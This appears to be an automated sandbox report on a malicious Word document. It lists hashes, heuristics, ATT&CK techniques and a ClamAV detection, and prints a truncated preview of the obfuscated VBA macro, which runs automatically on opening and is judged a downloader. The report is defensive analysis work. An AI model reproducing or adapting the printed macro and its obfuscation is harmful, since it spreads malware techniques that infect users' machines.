Office (OLE) malware analysis — malicious · b260a324f1d3b613

MALICIOUS

Office (OLE)

248.0 KB Created: 2020-01-15 19:43:00 Authoring application: Microsoft Office Word First seen: 2020-09-24

MD5: 657c45ade4303bb41097337af74f446f SHA-1: f4bc5c8995e3e799fa130fba23314f2f95050c6b SHA-256: b260a324f1d3b6135a4c52889fb0a4e436ddd6adb6ce61c380b25b33e3a05b80

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Office document containing VBA macros, specifically a Document_Open macro that is designed to execute automatically. The presence of GetObject calls and p-code auto-execution further indicates malicious intent. While the script is heavily obfuscated, the overall pattern suggests it's a downloader for a second-stage payload, a common tactic for initial access via spearphishing attachments.

Heuristics 6

ClamAV: Doc.Malware.Chartres-7540597-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Chartres-7540597-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10927 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10927 bytes
SHA-256: `4f593d96537e091d0745d7e2991815e78721cebe69ac3e94d9f75187737e5cc4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Hfbzjnjgqdcc" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() Lxtmyibaoy End Sub Attribute VB_Name = "Lyqlryfqs" Attribute VB_Base = "0{54F4C79B-C307-4900-A9B5-9AB5BED6FD13}{5DC59947-6AAE-4674-AD4D-B24CD2FAB106}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Osnvvfzjmhlpi" Function Ysukmglx() Do While Zydlyneekt = 24 Loop Do While Pcgwboinuj = 2 Szeplxijaq = Sgn(3) Evamykyslspdn = CByte(Thprpgstyjptn + Lzlhrgowpklaz) Loop Do While Acaxpblybs = 63 Ccjrlimh = Cos(234 + CStr(324)) Loop Do While Fttflzhdfsuo = 5555 Spuwaakpfe = Fsasmsuiwhek Rxmthnswzv = 234 Loop Do While Hphqnotruod = 2 Cubpklkgo = CDbl(4) Clxybjteew = Int(1) Loop Do While Agtpqyrct = 1 Esqgokcjsgv = CInt(Rupkvzjj) Loop Jymsjabgerf = ChrW(wdKeyP) Do While Bjmzgdypoijok = 24 Loop Do While Yrlzcbevm = 2 Jdkboiauug = Sgn(3) Rxtjkgiqsbwhn = CByte(Vwxnafutuem + Nqybmttc) Loop Do While Tpdduigdnhuf = 63 Smsxeyexmhcbc = Cos(234 + CStr(324)) Loop Do While Tolledywbzko = 5555 Mghsciaavxkmw = Asfkhutjtttup Tjdyaaujamvts = 234 Loop Do While Rhvzahfd = 2 Txoyiokjy = CDbl(4) Jxcvgiey = Int(1) Loop Do While Avsblzpq = 1 Gjuhdglrykj = CInt(Ahjteuybfh) Loop Manlgywi = Jymsjabgerf + Lyqlryfqs.Opfsodhpd + Lyqlryfqs.Ntlvpgiwp Do While Vizbsxwved = 24 Loop Do While Mabgtyomi = 2 Ugqxoulswppy = Sgn(3) Vwgxdicfgx = CByte(Ehvebdcpfub + Atloswbbx) Loop Do While Ipfkqozt = 63 Qdwsomwkeaugp = Cos(234 + CStr(324)) Loop Do While Rrnbpohjsvl = 5555 Zqvhtikpovej = Sxhbzdvzxms Juexcoelof = 234 Loop Do While Hszcvjrkxo = 2 Tmuwasipcw = CDbl(4) Kybvafdruosl = Int(1) Loop Do While Ccbgnuisdquik = 1 Ykkqesxivjrlu = CInt(Uiaeqfnvi) Loop Xdkqzbncw = Split(Manlgywi + LTrim(LTrim(Lyqlryfqs.Dardtpwwk. _ Tag)), ",,,,sdf7&&jsad,,,") Do While Jxyfufbqolvkg = 24 Loop Do While Iicvjkgdl = 2 Nysosikxgr = Sgn(3) Gykarzctvq = CByte(Qdtwocunilrdx + Mziboxzvxykp) Loop Do While Dnxuvxponj = 63 Xzvghcqgqtnop = Cos(234 + CStr(324)) Loop Do While Hvxdnqeextj = 5555 Dxmyxsaz = Rhyxskzjeug Pfqfsuxmxand = 234 Loop Do While Orwariegw = 2 Muxkehwvewth = CDbl(4) Ecetgkuad = Int(1) Loop Do While Iuozojjbmgaz = 1 Tqhnkvkjsmga = CInt(Ezlqmswmiwq) Loop Ysukmglx = Wljtuuydmaqgq + Join(Xdkqzbncw, "") + Wljtuuydmaqgq Do While Oplqlawlqyzx = 24 Loop Do While Vhutvkoof = 2 Zkjdrhiymomez = Sgn(3) Kiyudjiuun = CByte(Uafakbulqm + Rryqsicuviafq) Loop Do While Mrpppgxox = 63 Bdfnwxazdlk = Cos(234 + CStr(324)) Loop Do While Llqolzzj = 5555 Itbxssucajdgz = Mderhuban Qicxgfbh = 234 Loop Do While Vzhgjjkhyela = 2 Wvrsbgsnuobla = CDbl(4) Yessnrdx = Int(1) Loop Do While Krsoysqbdblnj = 1 Ahftfxjheaz = CInt(Tisxhuqoz) Loop End Function Function Lxtmyibaoy() a = ",,,,sdf7&&jsad,,,in,,,,sdf7&&jsad,,,,,, ... (truncated)

SHA-256: 4f593d96537e091d0745d7e2991815e78721cebe69ac3e94d9f75187737e5cc4

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Hfbzjnjgqdcc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Lxtmyibaoy
End Sub

Attribute VB_Name = "Lyqlryfqs"
Attribute VB_Base = "0{54F4C79B-C307-4900-A9B5-9AB5BED6FD13}{5DC59947-6AAE-4674-AD4D-B24CD2FAB106}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Osnvvfzjmhlpi"
Function Ysukmglx()
   Do While Zydlyneekt = 24
      Loop
            Do While Pcgwboinuj = 2
            Szeplxijaq = Sgn(3)
            Evamykyslspdn = CByte(Thprpgstyjptn + Lzlhrgowpklaz)
      Loop
      Do While Acaxpblybs = 63
            Ccjrlimh = Cos(234 + CStr(324))
      Loop
            Do While Fttflzhdfsuo = 5555
            Spuwaakpfe = Fsasmsuiwhek
            Rxmthnswzv = 234
      Loop
            Do While Hphqnotruod = 2
            Cubpklkgo = CDbl(4)
            Clxybjteew = Int(1)
      Loop
            Do While Agtpqyrct = 1
            Esqgokcjsgv = CInt(Rupkvzjj)
Loop
Jymsjabgerf = ChrW(wdKeyP)
   Do While Bjmzgdypoijok = 24
      Loop
            Do While Yrlzcbevm = 2
            Jdkboiauug = Sgn(3)
            Rxtjkgiqsbwhn = CByte(Vwxnafutuem + Nqybmttc)
      Loop
      Do While Tpdduigdnhuf = 63
            Smsxeyexmhcbc = Cos(234 + CStr(324))
      Loop
            Do While Tolledywbzko = 5555
            Mghsciaavxkmw = Asfkhutjtttup
            Tjdyaaujamvts = 234
      Loop
            Do While Rhvzahfd = 2
            Txoyiokjy = CDbl(4)
            Jxcvgiey = Int(1)
      Loop
            Do While Avsblzpq = 1
            Gjuhdglrykj = CInt(Ahjteuybfh)
Loop
Manlgywi = Jymsjabgerf + Lyqlryfqs.Opfsodhpd + Lyqlryfqs.Ntlvpgiwp
   Do While Vizbsxwved = 24
      Loop
            Do While Mabgtyomi = 2
            Ugqxoulswppy = Sgn(3)
            Vwgxdicfgx = CByte(Ehvebdcpfub + Atloswbbx)
      Loop
      Do While Ipfkqozt = 63
            Qdwsomwkeaugp = Cos(234 + CStr(324))
      Loop
            Do While Rrnbpohjsvl = 5555
            Zqvhtikpovej = Sxhbzdvzxms
            Juexcoelof = 234
      Loop
            Do While Hszcvjrkxo = 2
            Tmuwasipcw = CDbl(4)
            Kybvafdruosl = Int(1)
      Loop
            Do While Ccbgnuisdquik = 1
            Ykkqesxivjrlu = CInt(Uiaeqfnvi)
Loop
Xdkqzbncw = Split(Manlgywi + LTrim(LTrim(Lyqlryfqs.Dardtpwwk. _
Tag)), ",,,,sdf7&&jsad,,,")
   Do While Jxyfufbqolvkg = 24
      Loop
            Do While Iicvjkgdl = 2
            Nysosikxgr = Sgn(3)
            Gykarzctvq = CByte(Qdtwocunilrdx + Mziboxzvxykp)
      Loop
      Do While Dnxuvxponj = 63
            Xzvghcqgqtnop = Cos(234 + CStr(324))
      Loop
            Do While Hvxdnqeextj = 5555
            Dxmyxsaz = Rhyxskzjeug
            Pfqfsuxmxand = 234
      Loop
            Do While Orwariegw = 2
            Muxkehwvewth = CDbl(4)
            Ecetgkuad = Int(1)
      Loop
            Do While Iuozojjbmgaz = 1
            Tqhnkvkjsmga = CInt(Ezlqmswmiwq)
Loop
Ysukmglx = Wljtuuydmaqgq + Join(Xdkqzbncw, "") + Wljtuuydmaqgq
   Do While Oplqlawlqyzx = 24
      Loop
            Do While Vhutvkoof = 2
            Zkjdrhiymomez = Sgn(3)
            Kiyudjiuun = CByte(Uafakbulqm + Rryqsicuviafq)
      Loop
      Do While Mrpppgxox = 63
            Bdfnwxazdlk = Cos(234 + CStr(324))
      Loop
            Do While Llqolzzj = 5555
            Itbxssucajdgz = Mderhuban
            Qicxgfbh = 234
      Loop
            Do While Vzhgjjkhyela = 2
            Wvrsbgsnuobla = CDbl(4)
            Yessnrdx = Int(1)
      Loop
            Do While Krsoysqbdblnj = 1
            Ahftfxjheaz = CInt(Tisxhuqoz)
Loop
End Function
Function Lxtmyibaoy()
a = ",,,,sdf7&&jsad,,,in,,,,sdf7&&jsad,,,,,,
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.